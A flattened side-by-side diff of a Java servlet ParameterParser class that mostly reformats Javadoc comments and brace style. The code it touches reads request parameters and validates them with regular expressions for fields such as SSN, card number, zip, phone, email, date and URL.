/** /**
* Gets the booleanSubParameter attribute of the ParameterParser object * Gets the booleanSubParameter attribute of the ParameterParser object
* *
*@param first Description of the Parameter * @param first
*@param next Description of the Parameter * Description of the Parameter
*@param def Description of the Parameter * @param next
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The booleanSubParameter value * @return The booleanSubParameter value
*/ */
public boolean getBooleanSubParameter(String first, String next, boolean def) public boolean getBooleanSubParameter(String first, String next, boolean def)
@ -144,30 +148,31 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a byte * Gets the named parameter value as a byte
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a byte * @return the parameter value as a byte
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter value could not be * if the parameter was not found
* converted to a byte * @exception NumberFormatException
* if the parameter value could not be converted to a byte
*/ */
public byte getByteParameter(String name) public byte getByteParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return Byte.parseByte(getStringParameter(name)); return Byte.parseByte(getStringParameter(name));
} }
/** /**
* Gets the named parameter value as a byte, with a default. Returns the * Gets the named parameter value as a byte, with a default. Returns the
* default value if the parameter is not found or cannot be converted to a * default value if the parameter is not found or cannot be converted to a
* byte. * byte.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a byte, or the default * @return the parameter value as a byte, or the default
*/ */
public byte getByteParameter(String name, byte def) public byte getByteParameter(String name, byte def)
@ -182,14 +187,14 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a char * Gets the named parameter value as a char
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a char * @return the parameter value as a char
*@exception ParameterNotFoundException if the parameter was not found or was * @exception ParameterNotFoundException
* the empty string * if the parameter was not found or was the empty string
*/ */
public char getCharParameter(String name) throws ParameterNotFoundException public char getCharParameter(String name) throws ParameterNotFoundException
{ {
@ -198,20 +203,20 @@ public class ParameterParser
if (param.length() == 0) if (param.length() == 0)
{ {
throw new ParameterNotFoundException(name + " is empty string"); throw new ParameterNotFoundException(name + " is empty string");
} } else
else
{ {
return (param.charAt(0)); return (param.charAt(0));
} }
} }
/** /**
* Gets the named parameter value as a char, with a default. Returns the * Gets the named parameter value as a char, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a char, or the default * @return the parameter value as a char, or the default
*/ */
public char getCharParameter(String name, char def) public char getCharParameter(String name, char def)
@ -226,15 +231,14 @@ public class ParameterParser
} }
} }
/** /**
* Gets the classNameParameter attribute of the ParameterParser object * Gets the classNameParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
* Description of the Parameter
* @return The classNameParameter value * @return The classNameParameter value
*/ */
public String getClassNameParameter(String name) public String getClassNameParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String p = getStringParameter(name); String p = getStringParameter(name);
StringTokenizer st = new StringTokenizer(p); StringTokenizer st = new StringTokenizer(p);
@ -242,14 +246,15 @@ public class ParameterParser
return (st.nextToken().trim()); return (st.nextToken().trim());
} }
// FIXME: check for [a-zA-Z].([a-zA-Z])* // FIXME: check for [a-zA-Z].([a-zA-Z])*
/** /**
* Gets the classNameParameter attribute of the ParameterParser object * Gets the classNameParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
*@param def Description of the Parameter * Description of the Parameter
* @param def
* Description of the Parameter
* @return The classNameParameter value * @return The classNameParameter value
*/ */
public String getClassNameParameter(String name, String def) public String getClassNameParameter(String name, String def)
@ -264,29 +269,30 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a double * Gets the named parameter value as a double
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a double * @return the parameter value as a double
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a double * @exception NumberFormatException
* if the parameter could not be converted to a double
*/ */
public double getDoubleParameter(String name) public double getDoubleParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return new Double(getStringParameter(name)).doubleValue(); return new Double(getStringParameter(name)).doubleValue();
} }
/** /**
* Gets the named parameter value as a double, with a default. Returns the * Gets the named parameter value as a double, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a double, or the default * @return the parameter value as a double, or the default
*/ */
public double getDoubleParameter(String name, double def) public double getDoubleParameter(String name, double def)
@ -301,29 +307,30 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a float * Gets the named parameter value as a float
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a float * @return the parameter value as a float
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a float * @exception NumberFormatException
* if the parameter could not be converted to a float
*/ */
public float getFloatParameter(String name) public float getFloatParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return new Float(getStringParameter(name)).floatValue(); return new Float(getStringParameter(name)).floatValue();
} }
/** /**
* Gets the named parameter value as a float, with a default. Returns the * Gets the named parameter value as a float, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a float, or the default * @return the parameter value as a float, or the default
*/ */
public float getFloatParameter(String name, float def) public float getFloatParameter(String name, float def)
@ -338,13 +345,14 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as an IP String, with a default. Returns the * Gets the named parameter value as an IP String, with a default. Returns
* default value if the parameter is not found or is the empty string. * the default value if the parameter is not found or is the empty string.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a String, or the default * @return the parameter value as a String, or the default
*/ */
public String getIPParameter(String name, String def) public String getIPParameter(String name, String def)
@ -359,15 +367,15 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as an IP String * Gets the named parameter value as an IP String
* *
*@param name the parameter name * @param name
*@return the parameter value as a valid IP * the parameter name
* String or an Empty string if invalid * @return the parameter value as a valid IP String or an Empty string if
*@exception ParameterNotFoundException if the parameter was not found or was * invalid
* the empty string * @exception ParameterNotFoundException
* if the parameter was not found or was the empty string
*/ */
public String getIPParameter(String name) throws ParameterNotFoundException public String getIPParameter(String name) throws ParameterNotFoundException
{ {
@ -378,12 +386,10 @@ public class ParameterParser
if (values == null) if (values == null)
{ {
throw new ParameterNotFoundException(name + " not found"); throw new ParameterNotFoundException(name + " not found");
} } else if (values[0].length() == 0)
else if (values[0].length() == 0)
{ {
throw new ParameterNotFoundException(name + " was empty"); throw new ParameterNotFoundException(name + " was empty");
} } else
else
{ {
// trim illegal characters // trim illegal characters
value = clean(values[0].trim()); value = clean(values[0].trim());
@ -432,8 +438,7 @@ public class ParameterParser
octetCount++; octetCount++;
} }
} } else
else
{ {
// Not a valid IP // Not a valid IP
valid = false; valid = false;
@ -450,29 +455,30 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a int * Gets the named parameter value as a int
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a int * @return the parameter value as a int
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a int * @exception NumberFormatException
* if the parameter could not be converted to a int
*/ */
public int getIntParameter(String name) throws ParameterNotFoundException, public int getIntParameter(String name) throws ParameterNotFoundException, NumberFormatException
NumberFormatException
{ {
return Integer.parseInt(getStringParameter(name)); return Integer.parseInt(getStringParameter(name));
} }
/** /**
* Gets the named parameter value as a int, with a default. Returns the * Gets the named parameter value as a int, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a int, or the default * @return the parameter value as a int, or the default
*/ */
public int getIntParameter(String name, int def) public int getIntParameter(String name, int def)
@ -487,29 +493,30 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a long * Gets the named parameter value as a long
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a long * @return the parameter value as a long
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a long * @exception NumberFormatException
* if the parameter could not be converted to a long
*/ */
public long getLongParameter(String name) public long getLongParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return Long.parseLong(getStringParameter(name)); return Long.parseLong(getStringParameter(name));
} }
/** /**
* Gets the named parameter value as a long, with a default. Returns the * Gets the named parameter value as a long, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a long, or the default * @return the parameter value as a long, or the default
*/ */
public long getLongParameter(String name, long def) public long getLongParameter(String name, long def)
@ -524,14 +531,13 @@ public class ParameterParser
} }
} }
/** /**
* Determines which of the required parameters were missing from the request. * Determines which of the required parameters were missing from the
* Returns null if all the parameters are present. * request. Returns null if all the parameters are present.
* *
*@param requestuired Description of the Parameter * @param requestuired
*@return an array of missing parameters, or null if none are * Description of the Parameter
* missing * @return an array of missing parameters, or null if none are missing
*/ */
public String[] getMissingParameters(String[] requestuired) public String[] getMissingParameters(String[] requestuired)
{ {
@ -550,8 +556,7 @@ public class ParameterParser
if (missing.size() == 0) if (missing.size() == 0)
{ {
return null; return null;
} } else
else
{ {
String[] ret = new String[missing.size()]; String[] ret = new String[missing.size()];
missing.copyInto(ret); missing.copyInto(ret);
@ -560,7 +565,6 @@ public class ParameterParser
} }
} }
/** /**
* Gets the parameterNames attribute of the ParameterParser object * Gets the parameterNames attribute of the ParameterParser object
* *
@ -576,11 +580,11 @@ public class ParameterParser
return request.getParameterNames(); return request.getParameterNames();
} }
/** /**
* Gets the parameterValues attribute of the ParameterParser object * Gets the parameterValues attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
* Description of the Parameter
* @return The parameterValues value * @return The parameterValues value
*/ */
public String[] getParameterValues(String name) public String[] getParameterValues(String name)
@ -593,12 +597,13 @@ public class ParameterParser
return request.getParameterValues(name); return request.getParameterValues(name);
} }
/** /**
* Gets the rawParameter attribute of the ParameterParser object * Gets the rawParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
*@param def Description of the Parameter * Description of the Parameter
* @param def
* Description of the Parameter
* @return The rawParameter value * @return The rawParameter value
*/ */
public String getRawParameter(String name, String def) public String getRawParameter(String name, String def)
@ -613,24 +618,23 @@ public class ParameterParser
} }
} }
/** /**
* Gets the rawParameter attribute of the ParameterParser object * Gets the rawParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
* Description of the Parameter
* @return The rawParameter value * @return The rawParameter value
*@exception ParameterNotFoundException Description of the Exception * @exception ParameterNotFoundException
* Description of the Exception
*/ */
public String getRawParameter(String name) public String getRawParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String[] values = request.getParameterValues(name); String[] values = request.getParameterValues(name);
if (values == null) if (values == null)
{ {
throw new ParameterNotFoundException(name + " not found"); throw new ParameterNotFoundException(name + " not found");
} } else if (values[0].length() == 0)
else if (values[0].length() == 0)
{ {
throw new ParameterNotFoundException(name + " was empty"); throw new ParameterNotFoundException(name + " was empty");
} }
@ -638,29 +642,30 @@ public class ParameterParser
return (values[0]); return (values[0]);
} }
/** /**
* Gets the named parameter value as a short * Gets the named parameter value as a short
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a short * @return the parameter value as a short
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
*@exception NumberFormatException if the parameter could not be * if the parameter was not found
* converted to a short * @exception NumberFormatException
* if the parameter could not be converted to a short
*/ */
public short getShortParameter(String name) public short getShortParameter(String name) throws ParameterNotFoundException, NumberFormatException
throws ParameterNotFoundException, NumberFormatException
{ {
return Short.parseShort(getStringParameter(name)); return Short.parseShort(getStringParameter(name));
} }
/** /**
* Gets the named parameter value as a short, with a default. Returns the * Gets the named parameter value as a short, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a short, or the default * @return the parameter value as a short, or the default
*/ */
public short getShortParameter(String name, short def) public short getShortParameter(String name, short def)
@ -675,17 +680,16 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a String * Gets the named parameter value as a String
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a String * @return the parameter value as a String
*@exception ParameterNotFoundException if the parameter was not found or was * @exception ParameterNotFoundException
* the empty string * if the parameter was not found or was the empty string
*/ */
public String getStringParameter(String name) public String getStringParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String[] values = request.getParameterValues(name); String[] values = request.getParameterValues(name);
String value; String value;
@ -693,12 +697,10 @@ public class ParameterParser
if (values == null) if (values == null)
{ {
throw new ParameterNotFoundException(name + " not found"); throw new ParameterNotFoundException(name + " not found");
} } else if (values[0].length() == 0)
else if (values[0].length() == 0)
{ {
throw new ParameterNotFoundException(name + " was empty"); throw new ParameterNotFoundException(name + " was empty");
} } else
else
{ {
// trim illegal characters // trim illegal characters
value = clean(values[0].trim()); value = clean(values[0].trim());
@ -713,13 +715,14 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a String, with a default. Returns the * Gets the named parameter value as a String, with a default. Returns the
* default value if the parameter is not found or is the empty string. * default value if the parameter is not found or is the empty string.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a String, or the default * @return the parameter value as a String, or the default
*/ */
public String getStringParameter(String name, String def) public String getStringParameter(String name, String def)
@ -734,13 +737,15 @@ public class ParameterParser
} }
} }
/** /**
* Gets the subParameter attribute of the ParameterParser object * Gets the subParameter attribute of the ParameterParser object
* *
*@param first Description of the Parameter * @param first
*@param next Description of the Parameter * Description of the Parameter
*@param def Description of the Parameter * @param next
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The subParameter value * @return The subParameter value
*/ */
public String getSubParameter(String first, String next, String def) public String getSubParameter(String first, String next, String def)
@ -755,18 +760,19 @@ public class ParameterParser
} }
} }
/** /**
* Gets the parameter named 'next' following the parameter 'first'. Presumes * Gets the parameter named 'next' following the parameter 'first'. Presumes
* the structure: first=firstvalue&next=nextValue * the structure: first=firstvalue&next=nextValue
* *
*@param first Description of the Parameter * @param first
*@param next Description of the Parameter * Description of the Parameter
* @param next
* Description of the Parameter
* @return The subParameter value * @return The subParameter value
*@exception ParameterNotFoundException Description of the Exception * @exception ParameterNotFoundException
* Description of the Exception
*/ */
public String getSubParameter(String first, String next) public String getSubParameter(String first, String next) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String[] values = request.getParameterValues(first); String[] values = request.getParameterValues(first);
String value; String value;
@ -774,12 +780,10 @@ public class ParameterParser
if (values == null) if (values == null)
{ {
throw new ParameterNotFoundException(first + " not found"); throw new ParameterNotFoundException(first + " not found");
} } else if (values[0].length() == 0)
else if (values[0].length() == 0)
{ {
throw new ParameterNotFoundException(first + " was empty"); throw new ParameterNotFoundException(first + " was empty");
} } else
else
{ {
value = clean(values[0].trim()); value = clean(values[0].trim());
@ -793,10 +797,12 @@ public class ParameterParser
value = value.substring(idx); value = value.substring(idx);
//System.out.println("= = = = = =Parameter parser looking for " + next + " in " + value ); // System.out.println("= = = = = =Parameter parser looking for " +
// next + " in " + value );
int nextValueIndex = value.indexOf(next + "="); int nextValueIndex = value.indexOf(next + "=");
//System.out.println("= = = = = =Parameter parser nextValueIndex = " + nextValueIndex ); // System.out.println("= = = = = =Parameter parser nextValueIndex =
// " + nextValueIndex );
if (nextValueIndex < 0) if (nextValueIndex < 0)
{ {
throw new ParameterNotFoundException("No subparameter value"); throw new ParameterNotFoundException("No subparameter value");
@ -807,8 +813,7 @@ public class ParameterParser
if (nextValueIndex >= 0) if (nextValueIndex >= 0)
{ {
value = value.substring(nextValueIndex); value = value.substring(nextValueIndex);
} } else
else
{ {
throw new ParameterNotFoundException(next + " not found"); throw new ParameterNotFoundException(next + " not found");
} }
@ -820,19 +825,19 @@ public class ParameterParser
value = value.substring(0, value.indexOf("&")); value = value.substring(0, value.indexOf("&"));
} }
//System.out.println("=-=-=-=-=ParameterParser returning value " + value ); // System.out.println("=-=-=-=-=ParameterParser returning value " +
// value );
return value; return value;
} }
/** /**
* Gets the wordParameter attribute of the ParameterParser object * Gets the wordParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
* Description of the Parameter
* @return The wordParameter value * @return The wordParameter value
*/ */
public String getWordParameter(String name) public String getWordParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
String p = getStringParameter(name); String p = getStringParameter(name);
StringTokenizer st = new StringTokenizer(p); StringTokenizer st = new StringTokenizer(p);
@ -840,14 +845,15 @@ public class ParameterParser
return (st.nextToken().trim()); return (st.nextToken().trim());
} }
// FIXME: check for [a-zA-Z] // FIXME: check for [a-zA-Z]
/** /**
* Gets the wordParameter attribute of the ParameterParser object * Gets the wordParameter attribute of the ParameterParser object
* *
*@param name Description of the Parameter * @param name
*@param def Description of the Parameter * Description of the Parameter
* @param def
* Description of the Parameter
* @return The wordParameter value * @return The wordParameter value
*/ */
public String getWordParameter(String name, String def) public String getWordParameter(String name, String def)
@ -862,18 +868,22 @@ public class ParameterParser
} }
} }
/** /**
* Gets the specified parameter from the request and validates it against the provided regular expression. * Gets the specified parameter from the request and validates it against
* If the regular expression check fails, the default value is returned instead. * the provided regular expression. If the regular expression check fails,
* the default value is returned instead.
* *
*@param name The name of the parameter to retrieve from the request. * @param name
*@param def The default value of the parameter. * The name of the parameter to retrieve from the request.
*@param regexpattern The precompiled regular expression to be used to validate the parameter. * @param def
*@return The validated parameter value, or the default value if validation failed. * The default value of the parameter.
* @param regexpattern
* The precompiled regular expression to be used to validate the
* parameter.
* @return The validated parameter value, or the default value if validation
* failed.
*/ */
private String getRegexParameter(String name, String def, private String getRegexParameter(String name, String def, Pattern regexpattern) throws ValidationException
Pattern regexpattern) throws ValidationException
{ {
try try
{ {
@ -887,35 +897,38 @@ public class ParameterParser
} }
} }
/** /**
* Gets the specified parameter from the request and validates it against the provided regular expression. * Gets the specified parameter from the request and validates it against
* If the regular expression check fails, the default value is returned instead. * the provided regular expression. If the regular expression check fails,
* the default value is returned instead.
* *
*@param name The name of the parameter to retrieve from the request. * @param name
*@param def The default value of the parameter. * The name of the parameter to retrieve from the request.
*@param regexpattern The precompiled regular expression to be used to validate the parameter. * @param def
*@return The validated parameter value, or the default value if validation failed. * The default value of the parameter.
* @param regexpattern
* The precompiled regular expression to be used to validate the
* parameter.
* @return The validated parameter value, or the default value if validation
* failed.
*/ */
private String getRegexParameter(String name, Pattern regexpattern) private String getRegexParameter(String name, Pattern regexpattern) throws ParameterNotFoundException,
throws ParameterNotFoundException, ValidationException ValidationException
{ {
String param = getStringParameter(name); String param = getStringParameter(name);
if (regexpattern.matcher(param).matches()) if (regexpattern.matcher(param).matches())
{ {
return param; return param;
} } else
else
{ {
// System.out.println(param + " didn't match defined pattern."); // System.out.println(param + " didn't match defined pattern.");
throw new ValidationException(name + " contained an invalid value"); throw new ValidationException(name + " contained an invalid value");
} }
} }
public String getStrictAlphaParameter(String name, int maxLength) throws ParameterNotFoundException,
public String getStrictAlphaParameter(String name, int maxLength) ValidationException
throws ParameterNotFoundException, ValidationException
{ {
String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$"; String alphaRegEx = "^[a-zA-Z\\s]{0," + maxLength + "}$";
Pattern alphaPattern = Pattern.compile(alphaRegEx); Pattern alphaPattern = Pattern.compile(alphaRegEx);
@ -923,9 +936,8 @@ public class ParameterParser
return getRegexParameter(name, alphaPattern); return getRegexParameter(name, alphaPattern);
} }
public String getStrictNumericParameter(String name, int maxLength) throws ParameterNotFoundException,
public String getStrictNumericParameter(String name, int maxLength) ValidationException
throws ParameterNotFoundException, ValidationException
{ {
String numericRegEx = "^\\d{0," + maxLength + "}$"; String numericRegEx = "^\\d{0," + maxLength + "}$";
Pattern numericPattern = Pattern.compile(numericRegEx); Pattern numericPattern = Pattern.compile(numericRegEx);
@ -937,22 +949,20 @@ public class ParameterParser
private static final Pattern Ssnpattern = Pattern.compile(SSNREGEX); private static final Pattern Ssnpattern = Pattern.compile(SSNREGEX);
public String getSsnParameter(String name) throws ParameterNotFoundException, ValidationException
public String getSsnParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getRegexParameter(name, Ssnpattern); return getRegexParameter(name, Ssnpattern);
} }
// Validates format for major brands of credit card. // Validates format for major brands of credit card.
//private static final String CCNREGEX = "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([ -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$"; // private static final String CCNREGEX =
// "^(?:(?<Visa>4\\d{3})|(?<Mastercard>5[1-5]\\d{2})|(?<Discover>6011)|(?<DinersClub>(?:3[68]\\d{2})|(?:30[0-5]\\d))|(?<AmericanExpress>3[47]\\d{2}))([
// -]?)(?(DinersClub)(?:\\d{6}\\1\\d{4})|(?(AmericanExpress)(?:\\d{6}\\1\\d{5})|(?:\\d{4}\\1\\d{4}\\1\\d{4})))$";
private static final String CCNREGEX = "^\\d{16}$"; private static final String CCNREGEX = "^\\d{16}$";
private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX); private static final Pattern Ccnpattern = Pattern.compile(CCNREGEX);
public String getCcnParameter(String name) throws ParameterNotFoundException, ValidationException
public String getCcnParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getRegexParameter(name, Ccnpattern); return getRegexParameter(name, Ccnpattern);
} }
@ -961,16 +971,12 @@ public class ParameterParser
private static final Pattern Zippattern = Pattern.compile(ZIPREGEX); private static final Pattern Zippattern = Pattern.compile(ZIPREGEX);
public String getZipParameter(String name) throws ParameterNotFoundException, ValidationException
public String getZipParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getZipParameter(name, null); return getZipParameter(name, null);
} }
public String getZipParameter(String name, String def) throws ValidationException
public String getZipParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, Zippattern); return getRegexParameter(name, def, Zippattern);
} }
@ -981,16 +987,12 @@ public class ParameterParser
// private static final String PHONEREGEX = "^([\\-()+ 0-9x])+$"; // private static final String PHONEREGEX = "^([\\-()+ 0-9x])+$";
private static final Pattern phonepattern = Pattern.compile(PHONEREGEX); private static final Pattern phonepattern = Pattern.compile(PHONEREGEX);
public String getPhoneParameter(String name) throws ParameterNotFoundException, ValidationException
public String getPhoneParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getPhoneParameter(name, null); return getPhoneParameter(name, null);
} }
public String getPhoneParameter(String name, String def) throws ValidationException
public String getPhoneParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, phonepattern); return getRegexParameter(name, def, phonepattern);
} }
@ -999,16 +1001,12 @@ public class ParameterParser
private static final Pattern emailpattern = Pattern.compile(EMAILREGEX); private static final Pattern emailpattern = Pattern.compile(EMAILREGEX);
public String getEMailParameter(String name) throws ParameterNotFoundException, ValidationException
public String getEMailParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getEMailParameter(name, null); return getEMailParameter(name, null);
} }
public String getEMailParameter(String name, String def) throws ValidationException
public String getEMailParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, emailpattern); return getRegexParameter(name, def, emailpattern);
} }
@ -1017,45 +1015,36 @@ public class ParameterParser
private static final Pattern datepattern = Pattern.compile(DATEREGEX); private static final Pattern datepattern = Pattern.compile(DATEREGEX);
public String getDateParameter(String name) throws ParameterNotFoundException, ValidationException
public String getDateParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getDateParameter(name, null); return getDateParameter(name, null);
} }
public String getDateParameter(String name, String def) throws ValidationException
public String getDateParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, datepattern); return getRegexParameter(name, def, datepattern);
} }
private static final String URLREGEX = "^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$"; private static final String URLREGEX =
"^(((https?)://)([-()_.!~*';/?:@&=+$,A-Za-z0-9])+)([).!';/?:,][[:blank:]])?$";
private static final Pattern URLpattern = Pattern.compile(URLREGEX); private static final Pattern URLpattern = Pattern.compile(URLREGEX);
public String getURLParameter(String name) throws ParameterNotFoundException, ValidationException
public String getURLParameter(String name)
throws ParameterNotFoundException, ValidationException
{ {
return getURLParameter(name, null); return getURLParameter(name, null);
} }
public String getURLParameter(String name, String def) throws ValidationException
public String getURLParameter(String name, String def)
throws ValidationException
{ {
return getRegexParameter(name, def, URLpattern); return getRegexParameter(name, def, URLpattern);
} }
protected static String htmlEncode(String s) protected static String htmlEncode(String s)
{ {
return HtmlEncoder.encode(s); return HtmlEncoder.encode(s);
} }
/** /**
* Description of the Method * Description of the Method
* *
@ -1083,11 +1072,11 @@ public class ParameterParser
return (s.toString()); return (s.toString());
} }
/** /**
* Description of the Method * Description of the Method
* *
*@param request Description of the Parameter * @param request
* Description of the Parameter
*/ */
public void update(ServletRequest request) public void update(ServletRequest request)
{ {